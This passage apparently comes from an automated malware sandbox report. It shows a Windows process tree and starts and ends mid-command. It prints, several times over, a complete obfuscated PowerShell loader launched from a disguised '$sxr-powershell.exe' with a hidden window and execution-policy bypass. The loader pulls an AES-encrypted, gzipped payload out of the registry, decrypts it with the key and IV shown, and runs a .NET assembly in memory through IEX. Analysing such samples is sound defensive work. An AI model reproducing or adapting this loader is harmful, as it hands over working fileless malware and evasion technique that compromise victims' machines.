[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:4508
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7068" "3028" "2964" "3032" "0" "0" "3036" "0" "0" "0" "0" "0"
        16⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6088
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:5712
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:4308
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        Hide Artifacts: Hidden Window
        
        PID:5312
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] 